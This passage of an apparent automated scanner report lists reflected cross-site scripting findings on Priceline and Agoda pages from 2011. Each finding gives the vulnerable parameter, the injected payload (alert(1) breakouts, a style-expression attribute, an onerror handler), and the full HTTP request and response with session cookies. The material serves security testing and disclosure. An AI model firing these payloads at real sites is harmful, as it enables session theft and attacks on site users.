rchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&otherCityName=Boston%2CUnited+States&CkInDay=04&session_key=711510AC721510AC20111003000909914181269334&key=gtapcnq5b0c98"%3balert(1)//acb6c7dcc1f&o_num=null

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:00 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498126


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
it("||");
    selLmID = selLM[0];
    selLmName = selLM[1];
    htlInitWaitMessage(C_WAIT_DELAY_SEARCH);
    var theAction = "/hotelsNearListings.do?key=gtapcnq5b0c98";alert(1)//acb6c7dcc1f&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN";
    window.location.href = "http://" + "travela.priceline.com" + "/hotel" + theAction + "&poiID=" + selLmID + "&poiName=" + escape(s
...[SNIP]...
4.150. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc99b'%3balert(1)//ce9060c5f8b was submitted in the key parameter. This input was echoed as fc99b';alert(1)//ce9060c5f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...
rchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&otherCityName=Boston%2CUnited+States&CkInDay=04&session_key=711510AC721510AC20111003000909914181269334&key=gtapcnq5fc99b'%3balert(1)//ce9060c5f8b&o_num=null

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:14 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=64247C3F36705ED9F645318F6EA1AA8E; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498127


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<script language="JavaScript">
function newSearch(){
newSearchURL('/hotel/1.do?pn=1&key=gtapcnq5fc99b';alert(1)//ce9060c5f8b&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN#newSearch');
}
function changeCity(){
changeCityURL('/hotel/changeCity.do?key=gtapcnq5fc99b';alert(1)//ce9060c5f8b&jsk=5463010a5064010a
...[SNIP]...
4.151. http://travela.priceline.com/hotel/searchHotels_process.do [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b080d"style%3d"x%3aexpression(alert(1))"0ff302ff5ae was submitted in the key parameter. This input was echoed as b080d"style="x:expression(alert(1))"0ff302ff5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...
rchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&otherCityName=Boston%2CUnited+States&CkInDay=04&session_key=711510AC721510AC20111003000909914181269334&key=gtapcnq5b080d"style%3d"x%3aexpression(alert(1))"0ff302ff5ae&o_num=null

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:46 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=9DCE631CD5E41480BE6987F382FD15D6; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 503777


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<a href="/hotel/listings.do?selectedTab=0&key=gtapcnq5b080d"style="x:expression(alert(1))"0ff302ff5ae&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN" class="selected-list">
...[SNIP]...
4.152. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the numberOfRooms request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ebfe"%3balert(1)//c64366dbbc8 was submitted in the numberOfRooms parameter. This input was echoed as 9ebfe";alert(1)//c64366dbbc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=19ebfe"%3balert(1)//c64366dbbc8&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&othe
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:58 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=D3B0AE8E8F20DA9739B628426E322F3D; Path=/hotel
Vary: Accept-Encoding
Content-Length: 297757
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
eaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=19ebfe";alert(1)//c64366dbbc8&country=US&static=Y", 'toolbar=no,width=1,height=1,left=" + (screen.width-30)/2 + ",top=" + (screen.height-30)/2 + ",status=yes,scrollbars=no,resizable=yes', true, true, "");
</SCRIPT>
...[SNIP]...
4.153. http://travela.priceline.com/hotel/searchHotels_process.do [numberOfRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The value of the numberOfRooms request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2abcf'%3balert(1)//704c3f0f990 was submitted in the numberOfRooms parameter. This input was echoed as 2abcf';alert(1)//704c3f0f990 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=12abcf'%3balert(1)//704c3f0f990&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInYear=2011&plf=pcln&homepage=Y&CkOutDay=07&searchHotelName=&starRating=-1&CkOutYear=2011&CkOutMonth=10&RefID=PLIGOUGO&CkInMonth=10&othe
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:08 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=7597DD4BB8230C132AF65EDD99327DB0; Path=/hotel
Vary: Accept-Encoding
Content-Length: 297756
Content-Type: text/html;;charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
submitForm(sURLAddon,zoneId) {

   
           var url='/hotels/startOffer.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&FromHotelRTLPath=Y&searchType=CITY&cityName=Boston%2C+MA&numberOfRooms=12abcf';alert(1)//704c3f0f990&cityID=3000008602&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011';
   

   if ((sURLAddon != null) && ((sURLAddon != ""))) {
       url=url+sURLAddon;
   }
   if (typeof(C_WAIT_DELAY_SEARCH)!="undefi
...[SNIP]...
4.154. http://travela.priceline.com/hotel/searchResults.do [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f61eb"%3balert(1)//53d85817f37 was submitted in the key parameter. This input was echoed as f61eb";alert(1)//53d85817f37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5f61eb"%3balert(1)//53d85817f37&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:27 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=D2D23F0F8DD825D314A241A82A20243B; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498012


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
it("||");
    selLmID = selLM[0];
    selLmName = selLM[1];
    htlInitWaitMessage(C_WAIT_DELAY_SEARCH);
    var theAction = "/hotelsNearListings.do?key=gtapcnq5f61eb";alert(1)//53d85817f37&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN";
    window.location.href = "http://" + "travela.priceline.com" + "/hotel" + theAction + "&poiID=" + selLmID + "&poiName=" + escape(s
...[SNIP]...
4.155. http://travela.priceline.com/hotel/searchResults.do [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31a85'%3balert(1)//a55356e1663 was submitted in the key parameter. This input was echoed as 31a85';alert(1)//a55356e1663 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq531a85'%3balert(1)//a55356e1663&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:54 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=47061B8143EDEB535C1CC46F73CE9D97; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 498011


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<script language="JavaScript">
function newSearch(){
newSearchURL('/hotel/1.do?pn=1&key=gtapcnq531a85';alert(1)//a55356e1663&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN#newSearch');
}
function changeCity(){
changeCityURL('/hotel/changeCity.do?key=gtapcnq531a85';alert(1)//a55356e1663&jsk=5463010a5064010a
...[SNIP]...
4.156. http://travela.priceline.com/hotel/searchResults.do [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b45"style%3d"x%3aexpression(alert(1))"f593ad246e3 was submitted in the key parameter. This input was echoed as e2b45"style="x:expression(alert(1))"f593ad246e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5e2b45"style%3d"x%3aexpression(alert(1))"f593ad246e3&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:44 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 503670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<a href="/hotel/listings.do?selectedTab=0&key=gtapcnq5e2b45"style="x:expression(alert(1))"f593ad246e3&jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN" class="selected-list">
...[SNIP]...
4.157. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_AdScript.aspx

Issue detail

The value of the conversionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d825c"onerror%3d"alert(1)"2170802e0bd was submitted in the conversionID parameter. This input was echoed as d825c"onerror="alert(1)"2170802e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306d825c"onerror%3d"alert(1)"2170802e0bd&conversionLabel=M6MLCJbtiQIQsuTm1QM&_=1317602266727 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:40:29 GMT
Content-Length: 364
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate


<html xmlns="http://www.w3.org/1999/xhtml">
<head></head>
<body>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306d825c"onerror="alert(1)"2170802e0bd/?label=M6MLCJbtiQIQsuTm1QM&guid=ON&script=0" />
...[SNIP]...
4.158. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_AdScript.aspx

Issue detail

